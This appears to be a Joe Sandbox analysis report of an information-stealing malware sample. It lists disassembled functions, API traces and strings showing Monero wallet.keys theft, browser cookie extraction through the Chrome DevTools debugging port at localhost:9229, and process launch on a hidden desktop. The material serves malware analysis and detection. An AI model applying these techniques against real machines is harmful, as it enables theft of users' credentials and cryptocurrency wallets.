Opcode ID: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
Instruction ID: c7232b8e9cdfa3d41438ff15828bec6d487674160e80e9d5a12c07380a3d7c53
Opcode Fuzzy Hash: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
Instruction Fuzzy Hash: D771C3B1421A04BBDFE33B32DD05B4AFEA37F04721F10491E919A22DB49E226965DF51

Function 00401070 Relevance: 45.8, APIs: 24, Strings: 2, Instructions: 278stringfileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040108A

Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00401015
Part of subcall function 00401000: HeapAlloc.KERNEL32(00000000), ref: 0040101C
Part of subcall function 00401000: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00401039
Part of subcall function 00401000: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401053
Part of subcall function 00401000: RegCloseKey.ADVAPI32(?), ref: 0040105D

lstrcatA.KERNEL32(?,00000000), ref: 004010A0
lstrlenA.KERNEL32(?), ref: 004010AD
lstrcatA.KERNEL32(?,.keys), ref: 004010C8
lstrcpy.KERNEL32(00000000,0042D01C), ref: 004010FF
lstrlenA.KERNEL32(00A0BD68), ref: 0040110D
lstrcpy.KERNEL32(00000000,?), ref: 00401131
lstrcatA.KERNEL32(00000000,00A0BD68), ref: 00401139
lstrlenA.KERNEL32(\Monero\wallet.keys), ref: 00401144
lstrcpy.KERNEL32(00000000,00000000), ref: 00401168
lstrcatA.KERNEL32(00000000,\Monero\wallet.keys), ref: 00401174
lstrcpy.KERNEL32(00000000,00000000), ref: 0040119A
lstrcpy.KERNEL32(00000000,0042D01C), ref: 004011DF
lstrlenA.KERNEL32(00A0E410), ref: 004011EE
lstrcpy.KERNEL32(00000000,?), ref: 00401215
lstrcatA.KERNEL32(00000000,?), ref: 0040121D
lstrcpy.KERNEL32(00000000,00000000), ref: 00401258
lstrcatA.KERNEL32(00000000), ref: 00401265
lstrcpy.KERNEL32(00000000,00000000), ref: 0040128C
CopyFileA.KERNEL32(?,?,00000001), ref: 004012B5
lstrcpy.KERNEL32(00000000,?), ref: 004012E1
lstrcpy.KERNEL32(00000000,?), ref: 0040131D

Part of subcall function 0041EF30: lstrcpy.KERNEL32(00000000,?), ref: 0041EF62

DeleteFileA.KERNEL32(?), ref: 00401351
memset.MSVCRT ref: 0040136E

Strings

.keys, xrefs: 004010BC
\Monero\wallet.keys, xrefs: 0040113F, 0040116E

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$lstrlen$FileHeapmemset$AllocCloseCopyDeleteOpenProcessQueryValue
String ID: .keys$\Monero\wallet.keys
API String ID: 2734118222-3586502688
Opcode ID: 9eda4a6cc88766a33cd02c84d7baa0a0e4ec5d0bc14cb39f866b325505556883
Instruction ID: 95442954b0c09f74f01b2627741839e7c598bf71559ee3eba0e7726b6ccc06b1
Opcode Fuzzy Hash: 9eda4a6cc88766a33cd02c84d7baa0a0e4ec5d0bc14cb39f866b325505556883
Instruction Fuzzy Hash: F0A15E71A002059BCB10AFB5DD89A9F77B9AF48304F44417AF905F72E1DB78DD018BA8

Function 02485E47 Relevance: 45.5, APIs: 30, Instructions: 486stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 02485E7C
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 02485EAB
lstrcpy.KERNEL32(00000000,00000000), ref: 02485EDC
lstrcpy.KERNEL32(00000000,00000000), ref: 02485F04
lstrcat.KERNEL32(00000000,00000000), ref: 02485F0F
lstrcpy.KERNEL32(00000000,00000000), ref: 02485F37
lstrcpy.KERNEL32(00000000,00000000), ref: 02485F6F
lstrcat.KERNEL32(00000000,00000000), ref: 02485F7A
lstrcpy.KERNEL32(00000000,00000000), ref: 02485F9F
lstrcpy.KERNEL32(00000000,0042D01C), ref: 02485FD5
lstrcpy.KERNEL32(00000000,00000000), ref: 02485FFD
lstrcat.KERNEL32(00000000,00000000), ref: 02486008
lstrcpy.KERNEL32(00000000,00000000), ref: 0248602F
lstrlen.KERNEL32(00431D64), ref: 02486041
lstrcpy.KERNEL32(00000000,00000000), ref: 02486060
lstrcat.KERNEL32(00000000,00431D64), ref: 0248606C
lstrlen.KERNEL32(00638DD8), ref: 0248607B
lstrcpy.KERNEL32(00000000,00000000), ref: 0248609E
lstrcat.KERNEL32(00000000,00000000), ref: 024860A9
lstrcpy.KERNEL32(00000000,00000000), ref: 024860D3
lstrcpy.KERNEL32(00000000,00000000), ref: 024860FF
GetFileAttributesA.KERNEL32(00000000), ref: 02486106
lstrcpy.KERNEL32(00000000,?), ref: 0248615E
lstrcpy.KERNEL32(00000000,?), ref: 024861CD
lstrcpy.KERNEL32(00000000,?), ref: 024861FF
lstrcpy.KERNEL32(00000000,?), ref: 02486242
lstrcpy.KERNEL32(00000000,00000000), ref: 0248626E
lstrcpy.KERNEL32(00000000,0042D01C), ref: 024862A6
lstrcpy.KERNEL32(00000000,?), ref: 02486318
lstrcpy.KERNEL32(00000000,00000000), ref: 0248633C

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
String ID:
API String ID: 2428362635-0
Opcode ID: 0aebda3382d32583c439ff0c954a19649f8748e18a2acc4a857f1244698f8087
Instruction ID: ce062f6bf0bd3dac748c7aeca36e2638ae71ca71f2d177bbe6b9f64de8ce7d84
Opcode Fuzzy Hash: 0aebda3382d32583c439ff0c954a19649f8748e18a2acc4a857f1244698f8087
Instruction Fuzzy Hash: 2A029A70A112559BDB21FF79CC88AAFBBFAAF44308F05452AE855A7350CB74D941CFA0

Function 02486B07 Relevance: 43.9, APIs: 29, Instructions: 437stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 02486B3C
lstrcpy.KERNEL32(00000000,0042D01C), ref: 02486B77
SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 02486BA1
lstrcpy.KERNEL32(00000000,00000000), ref: 02486BD8
lstrcpy.KERNEL32(00000000,00000000), ref: 02486BFD
lstrcat.KERNEL32(00000000,00000000), ref: 02486C05
lstrcpy.KERNEL32(00000000,00000000), ref: 02486C2E

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy$FolderPathlstrcat
String ID:
API String ID: 2938889746-0
Opcode ID: 86e5a9f99d952dc1f974e146edebfde16251fc6fa497a5deb16344c4399cf01b
Instruction ID: fa2d27cc20cd83dd17b8cc950bf5a4e0071d884619b521b21416d02bcc10dac3
Opcode Fuzzy Hash: 86e5a9f99d952dc1f974e146edebfde16251fc6fa497a5deb16344c4399cf01b
Instruction Fuzzy Hash: 70F17D70A102569BDB61FF79CC48AAF7BFAAF44308F05842AE85597351DB78D901CFA0

Function 004092E0 Relevance: 42.4, APIs: 19, Strings: 5, Instructions: 365stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004090F0: InternetOpenA.WININET(0042D01C,00000001,00000000,00000000,00000000), ref: 0040910F
Part of subcall function 004090F0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 0040912C
Part of subcall function 004090F0: InternetCloseHandle.WININET(00000000), ref: 00409139
Part of subcall function 004090F0: strlen.MSVCRT ref: 00409155

strlen.MSVCRT ref: 00409311
strlen.MSVCRT ref: 0040932A

Part of subcall function 00417EB0: memchr.MSVCRT ref: 00417EEF
Part of subcall function 00417EB0: memcmp.MSVCRT(00000000,?,?,?,"webSocketDebuggerUrl":,00000000), ref: 00417F09
Part of subcall function 00417EB0: memchr.MSVCRT ref: 00417F28

Part of subcall function 004089B0: std::_Xinvalid_argument.LIBCPMT ref: 004089C6

memset.MSVCRT ref: 00409371
lstrcatA.KERNEL32(?,ws://localhost:9229), ref: 0040938C
lstrcatA.KERNEL32(?,00000000), ref: 004093A2
strlen.MSVCRT ref: 004093C9
strlen.MSVCRT ref: 00409416
memcmp.MSVCRT(?,0042D01C,?), ref: 0040943B
memset.MSVCRT ref: 00409562
lstrcatA.KERNEL32(?,cookies), ref: 00409577
lstrcatA.KERNEL32(?,00431D64), ref: 00409589
lstrcatA.KERNEL32(?,?), ref: 0040959A
lstrcatA.KERNEL32(?,00435160), ref: 004095AC
lstrcatA.KERNEL32(?,?), ref: 004095BD
lstrcatA.KERNEL32(?,.txt), ref: 004095CF
lstrlenA.KERNEL32(?), ref: 004095E6
lstrlenA.KERNEL32(?), ref: 0040960B
lstrcpy.KERNEL32(00000000,?), ref: 00409644
memset.MSVCRT ref: 0040968C

Strings

ws://localhost:9229, xrefs: 00409380
/devtools, xrefs: 00409325, 00409330
localhost, xrefs: 004092FA, 00409318
cookies, xrefs: 0040956B
.txt, xrefs: 004095C3

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcat$strlen$Internetmemset$Openlstrlenmemchrmemcmp$CloseHandleXinvalid_argumentlstrcpystd::_
String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
API String ID: 2819545660-3542011879
Opcode ID: 3bfa10c1b4abe5d284f1050b5ea2d8c98c4b8e37d0dc89579856b6d55a03548b
Instruction ID: 864a5aaf990fcff81b4d6c55bfc79a47d2bf5be1f833ff5f37dcccbcd604048f
Opcode Fuzzy Hash: 3bfa10c1b4abe5d284f1050b5ea2d8c98c4b8e37d0dc89579856b6d55a03548b
Instruction Fuzzy Hash: 3EE12671E00218EBDF14DFA8C984ADEBBB5AF48304F50447AE509B7291DB789E45CF98

Function 02491E37 Relevance: 39.2, APIs: 26, Instructions: 192stringCOMMON

Download Yara Rule

APIs

Part of subcall function 02496627: GetProcAddress.KERNEL32(006390E0,00638DC8), ref: 02496680
Part of subcall function 02496627: GetProcAddress.KERNEL32(006390E0,00638E44), ref: 02496699
Part of subcall function 02496627: GetProcAddress.KERNEL32(006390E0,00638A64), ref: 024966B1
Part of subcall function 02496627: GetProcAddress.KERNEL32(006390E0,00638A50), ref: 024966C9
Part of subcall function 02496627: GetProcAddress.KERNEL32(006390E0,00638AF8), ref: 024966E2
Part of subcall function 02496627: GetProcAddress.KERNEL32(006390E0,00638CD4), ref: 024966FA
Part of subcall function 02496627: GetProcAddress.KERNEL32(006390E0,00638B3C), ref: 02496712
Part of subcall function 02496627: GetProcAddress.KERNEL32(006390E0,00638DA0), ref: 0249672B
Part of subcall function 02496627: GetProcAddress.KERNEL32(006390E0,00638D48), ref: 02496743
Part of subcall function 02496627: GetProcAddress.KERNEL32(006390E0,00638BBC), ref: 0249675B
Part of subcall function 02496627: GetProcAddress.KERNEL32(006390E0,00638AE8), ref: 02496774
Part of subcall function 02496627: GetProcAddress.KERNEL32(006390E0,00638E0C), ref: 0249678C
Part of subcall function 02496627: GetProcAddress.KERNEL32(006390E0,006388B0), ref: 024967A4

lstrcpy.KERNEL32(00000000,0042D01C), ref: 02491E76
GetUserDefaultLangID.KERNEL32 ref: 02491E7C

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: AddressProc$DefaultLangUserlstrcpy
String ID:
API String ID: 4154271814-0
Opcode ID: e9ed414595d713c08b5737fb47b7d7df39434625f9a60a04fbd9816609dc5aed
Instruction ID: 2c9f2182b65459bd832c6997db93203ca64bbffcada574a780c7b74738127076
Opcode Fuzzy Hash: e9ed414595d713c08b5737fb47b7d7df39434625f9a60a04fbd9816609dc5aed
Instruction Fuzzy Hash: 3E615F31500216AFDF21AF75DC88FAF7ABBAF45749F04502AF90A97264DBB49801DF60

Function 00421800 Relevance: 37.8, APIs: 25, Instructions: 269stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 0042182F
lstrlenA.KERNEL32(009E6588,00000000,00000000,?,?,00421B61), ref: 00421840
lstrcpy.KERNEL32(00000000,00000000), ref: 00421867
lstrcatA.KERNEL32(00000000,00000000), ref: 00421872
lstrcpy.KERNEL32(00000000,00000000), ref: 004218A1
lstrlenA.KERNEL32(00435564,?,?,00421B61), ref: 004218B3
lstrcpy.KERNEL32(00000000,00000000), ref: 004218D4
lstrcatA.KERNEL32(00000000,00435564,?,?,00421B61), ref: 004218E0
lstrcpy.KERNEL32(00000000,00000000), ref: 0042190F
lstrlenA.KERNEL32(009E65A8,?,?,00421B61), ref: 00421925
lstrcpy.KERNEL32(00000000,00000000), ref: 0042194C
lstrcatA.KERNEL32(00000000,00000000), ref: 00421957
lstrcpy.KERNEL32(00000000,00000000), ref: 00421986
lstrlenA.KERNEL32(00435564,?,?,00421B61), ref: 00421998
lstrcpy.KERNEL32(00000000,00000000), ref: 004219B9
lstrcatA.KERNEL32(00000000,00435564,?,?,00421B61), ref: 004219C5
lstrcpy.KERNEL32(00000000,00000000), ref: 004219F4
lstrlenA.KERNEL32(009E65B8,?,?,00421B61), ref: 00421A0A
lstrcpy.KERNEL32(00000000,00000000), ref: 00421A31
lstrcatA.KERNEL32(00000000,00000000), ref: 00421A3C
lstrcpy.KERNEL32(00000000,00000000), ref: 00421A6B
lstrlenA.KERNEL32(009E65D8,?,?,00421B61), ref: 00421A81
lstrcpy.KERNEL32(00000000,00000000), ref: 00421AA8
lstrcatA.KERNEL32(00000000,00000000), ref: 00421AB3
lstrcpy.KERNEL32(00000000,00000000), ref: 00421AE2

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcatlstrlen
String ID:
API String ID: 1049500425-0
Opcode ID: 311b411c21f255103ceab64b58adb14faa11b83e9ac96c1b0ac2e3f17e097d2a
Instruction ID: 274b4ab71ddff461c781089cdb5a89f9d7377c7fda2b54a99ae9043ae0fda87f
Opcode Fuzzy Hash: 311b411c21f255103ceab64b58adb14faa11b83e9ac96c1b0ac2e3f17e097d2a
Instruction Fuzzy Hash: 84914CB57017039BD720AFB6DD88A17B7E9AF14344B54583EA881D33B1DBB8D841CBA4

Function 024712D7 Relevance: 36.3, APIs: 24, Instructions: 278stringfileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 024712F1

Part of subcall function 02471267: GetProcessHeap.KERNEL32(00000000,00000104), ref: 0247127C
Part of subcall function 02471267: RtlAllocateHeap.NTDLL(00000000), ref: 02471283
Part of subcall function 02471267: RegOpenKeyExA.ADVAPI32(80000001,00431D24,00000000,00020119,?), ref: 024712A0
Part of subcall function 02471267: RegQueryValueExA.ADVAPI32(?,00431D18,00000000,00000000,00000000,000000FF), ref: 024712BA
Part of subcall function 02471267: RegCloseKey.ADVAPI32(?), ref: 024712C4

lstrcat.KERNEL32(?,00000000), ref: 02471307
lstrlen.KERNEL32(?), ref: 02471314
lstrcat.KERNEL32(?,00431D48), ref: 0247132F
lstrcpy.KERNEL32(00000000,0042D01C), ref: 02471366
lstrlen.KERNEL32(006389F0), ref: 02471374
lstrcpy.KERNEL32(00000000,?), ref: 02471398
lstrcat.KERNEL32(00000000,006389F0), ref: 024713A0
lstrlen.KERNEL32(00431D50), ref: 024713AB
lstrcpy.KERNEL32(00000000,00000000), ref: 024713CF
lstrcat.KERNEL32(00000000,00431D50), ref: 024713DB
lstrcpy.KERNEL32(00000000,00000000), ref: 02471401
lstrcpy.KERNEL32(00000000,0042D01C), ref: 02471446
lstrlen.KERNEL32(00638CA4), ref: 02471455
lstrcpy.KERNEL32(00000000,?), ref: 0247147C
lstrcat.KERNEL32(00000000,?), ref: 02471484
lstrcpy.KERNEL32(00000000,00000000), ref: 024714BF
lstrcat.KERNEL32(00000000), ref: 024714CC
lstrcpy.KERNEL32(00000000,00000000), ref: 024714F3
CopyFileA.KERNEL32(?,?,00000001), ref: 0247151C
lstrcpy.KERNEL32(00000000,?), ref: 02471548
lstrcpy.KERNEL32(00000000,?), ref: 02471584

Part of subcall function 0248F197: lstrcpy.KERNEL32(00000000,?), ref: 0248F1C9

DeleteFileA.KERNEL32(?), ref: 024715B8
memset.MSVCRT ref: 024715D5

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$lstrlen$FileHeapmemset$AllocateCloseCopyDeleteOpenProcessQueryValue
String ID:
API String ID: 1397529057-0
Opcode ID: 310d5bf42af13474714d64ac2762bf7d39da0fa1acd6f8eb4d61c63547e0b073
Instruction ID: 5f0fac2347c9ee578c6a2f870846ab4a8879030f6c854fc2f70893a51e3ff712
Opcode Fuzzy Hash: 310d5bf42af13474714d64ac2762bf7d39da0fa1acd6f8eb4d61c63547e0b073
Instruction Fuzzy Hash: 51A17171A00255ABDB21EFB5CC88EDE7BBAAF44304F04442AE969A7250DB74D905DFA0

Function 0248AE79 Relevance: 31.5, APIs: 25, Instructions: 297stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32 ref: 0248AE96
lstrlen.KERNEL32(00638DD4), ref: 0248AEAC
lstrcpy.KERNEL32(00000000,00000000), ref: 0248AED4
lstrcat.KERNEL32(00000000,00000000), ref: 0248AEDF
lstrcpy.KERNEL32(00000000,00000000), ref: 0248AF08
lstrcpy.KERNEL32(00000000,00000000), ref: 0248AF4B
lstrcat.KERNEL32(00000000,00000000), ref: 0248AF55
lstrcpy.KERNEL32(00000000,00000000), ref: 0248AF7E
lstrlen.KERNEL32(0043509C), ref: 0248AF98
lstrcpy.KERNEL32(00000000,00000000), ref: 0248AFBA
lstrcat.KERNEL32(00000000,0043509C), ref: 0248AFC6
lstrcpy.KERNEL32(00000000,00000000), ref: 0248AFEF
lstrlen.KERNEL32(0043509C), ref: 0248B001
lstrcpy.KERNEL32(00000000,00000000), ref: 0248B023
lstrcat.KERNEL32(00000000,0043509C), ref: 0248B02F
lstrcpy.KERNEL32(00000000,00000000), ref: 0248B058
lstrlen.KERNEL32(00638DB8), ref: 0248B06E
lstrcpy.KERNEL32(00000000,00000000), ref: 0248B096
lstrcat.KERNEL32(00000000,00000000), ref: 0248B0A1
lstrcpy.KERNEL32(00000000,00000000), ref: 0248B0CA
lstrcpy.KERNEL32(00000000,?), ref: 0248B106
lstrcat.KERNEL32(00000000,00000000), ref: 0248B110
lstrcpy.KERNEL32(00000000,00000000), ref: 0248B136
lstrlen.KERNEL32(00000000), ref: 0248B14C
lstrcpy.KERNEL32(00000000,00638A98), ref: 0248B17F

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$lstrlen
String ID:
API String ID: 2762123234-0
Opcode ID: 9101464e6f8103f87ad889bfc074e9eb7c51b8aa548391c385bb6237e351800d
Instruction ID: 6539e08cd7cffed031cccb81f8a31b58877be844b00e2125931899fc23a1d030
Opcode Fuzzy Hash: 9101464e6f8103f87ad889bfc074e9eb7c51b8aa548391c385bb6237e351800d
Instruction Fuzzy Hash: 19B14A719116269FDB21FF79CC88AEF77B6AF41308F04052AE864A7650DBB4D900DF90

Function 02491A67 Relevance: 31.5, APIs: 25, Instructions: 269stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 02491A96
lstrlen.KERNEL32(00638DEC), ref: 02491AA7
lstrcpy.KERNEL32(00000000,00000000), ref: 02491ACE
lstrcat.KERNEL32(00000000,00000000), ref: 02491AD9
lstrcpy.KERNEL32(00000000,00000000), ref: 02491B08
lstrlen.KERNEL32(00435564), ref: 02491B1A
lstrcpy.KERNEL32(00000000,00000000), ref: 02491B3B
lstrcat.KERNEL32(00000000,00435564), ref: 02491B47
lstrcpy.KERNEL32(00000000,00000000), ref: 02491B76
lstrlen.KERNEL32(00638B1C), ref: 02491B8C
lstrcpy.KERNEL32(00000000,00000000), ref: 02491BB3
lstrcat.KERNEL32(00000000,00000000), ref: 02491BBE
lstrcpy.KERNEL32(00000000,00000000), ref: 02491BED
lstrlen.KERNEL32(00435564), ref: 02491BFF
lstrcpy.KERNEL32(00000000,00000000), ref: 02491C20
lstrcat.KERNEL32(00000000,00435564), ref: 02491C2C
lstrcpy.KERNEL32(00000000,00000000), ref: 02491C5B
lstrlen.KERNEL32(00638D70), ref: 02491C71
lstrcpy.KERNEL32(00000000,00000000), ref: 02491C98
lstrcat.KERNEL32(00000000,00000000), ref: 02491CA3
lstrcpy.KERNEL32(00000000,00000000), ref: 02491CD2
lstrlen.KERNEL32(00638D6C), ref: 02491CE8
lstrcpy.KERNEL32(00000000,00000000), ref: 02491D0F
lstrcat.KERNEL32(00000000,00000000), ref: 02491D1A
lstrcpy.KERNEL32(00000000,00000000), ref: 02491D49

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcatlstrlen
String ID:
API String ID: 1049500425-0
Opcode ID: 7d047b6832bef589f5634e053af651aa6ff54b82b49a647bfc4f6edddc21a2fc
Instruction ID: 6df395082f14ccacd33c32064068993e4c6b7a2cdc592ca9b7321e5bd7da77b3
Opcode Fuzzy Hash: 7d047b6832bef589f5634e053af651aa6ff54b82b49a647bfc4f6edddc21a2fc
Instruction Fuzzy Hash: CC9110B06007479FEB20DF79CC88A5BBBEAAF44349B14582EA899D3750DB74D841DF60

Function 02479ADD Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 174stringsleepprocessCOMMON

Download Yara Rule

APIs

CreateDesktopA.USER32(?), ref: 02479AEF
memset.MSVCRT ref: 02479B0D
lstrcat.KERNEL32(?,?), ref: 02479B22
lstrcat.KERNEL32(?,?), ref: 02479B34
lstrcat.KERNEL32(?,00435128), ref: 02479B44
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 02479B81
lstrcpy.KERNEL32(00000000,?), ref: 02479BB7
StrStrA.SHLWAPI(?,00638C5C), ref: 02479BCC
lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 02479BE9
lstrlen.KERNEL32(?), ref: 02479BFD
wsprintfA.USER32 ref: 02479C0D
lstrcpy.KERNEL32(?,?), ref: 02479C24
memset.MSVCRT ref: 02479C3A
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,00000000), ref: 02479C99
Sleep.KERNEL32(00001388), ref: 02479CA8
CloseDesktop.USER32(?), ref: 02479CE8

Strings

D, xrefs: 02479C51

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcat$CreateDesktoplstrcpymemset$CloseFolderPathProcessSleeplstrcpynlstrlenwsprintf
String ID: D
API String ID: 3850938096-2746444292
Opcode ID: 5eab061456a3bc98197d9bb77ac40b44eda55df27ed5337f7ac901d636f383d5
Instruction ID: 38921e2fd3f2a672217dd052b413b2b68fbd8caa69502059933c96a21c233d26
Opcode Fuzzy Hash: 5eab061456a3bc98197d9bb77ac40b44eda55df27ed5337f7ac901d636f383d5
Instruction Fuzzy Hash: 66611DB1604340AFE720DF74DC45FDA7BE9AF88704F10491EFA9987291DBB499048BA6

Function 004090F0 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 161networkstringfileCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(0042D01C,00000001,00000000,00000000,00000000), ref: 0040910F
InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 0040912C
InternetCloseHandle.WININET(00000000), ref: 00409139
strlen.MSVCRT ref: 00409155
InternetReadFile.WININET(?,?,?,00000000), ref: 00409196
InternetReadFile.WININET(00000000,?,00001000,?), ref: 004091C7
InternetCloseHandle.WININET(00000000), ref: 004091D2
InternetCloseHandle.WININET(00000000), ref: 004091D9
strlen.MSVCRT ref: 004091EA
strlen.MSVCRT ref: 0040921D
strlen.MSVCRT ref: 0040925E

Part of subcall function 00417EB0: memchr.MSVCRT ref: 00417EEF
Part of subcall function 00417EB0: memcmp.MSVCRT(00000000,?,?,?,"webSocketDebuggerUrl":,00000000), ref: 00417F09
Part of subcall function 00417EB0: memchr.MSVCRT ref: 00417F28

strlen.MSVCRT ref: 0040927C

Part of subcall function 004089B0: std::_Xinvalid_argument.LIBCPMT ref: 004089C6

Strings

"webSocketDebuggerUrl":, xrefs: 004091E5, 004091F0
http://localhost:9229/json, xrefs: 00409126
"ws://, xrefs: 00409259, 00409264

Memory Dump Source

